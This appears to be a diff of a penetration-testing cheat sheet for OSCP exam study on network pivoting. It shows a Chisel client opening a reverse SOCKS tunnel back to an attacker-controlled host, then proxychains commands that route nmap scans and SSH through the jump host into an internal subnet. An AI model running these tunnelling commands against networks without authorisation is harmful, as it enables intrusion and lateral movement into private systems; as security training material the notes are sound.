redcountryroad/OSCP-shortsheet/PivotandForward.md

 #must be same port as chisel server
 .\Chisel.exe client --max-retry-count 1 192.168.60.200:1080 R:socks

 #You can now attack the third server (ex.
-10.0.60.99) by adding proxychains -q before every command.
+10.0.60.99 or any servers in 10.0.60.x domain) by adding proxychains -q before every command.
 The -q is for quiet mode since most attackers won’t need verbose proxy traffic
 #The traffic flows into port 1080 on your machine and out on your jump host, which has established a connection back to your listener on the port you specified when executing chisel server
 proxychains -q nmap -sC -sV 10.0.60.99 proxychains -q ssh user@10.0.60.99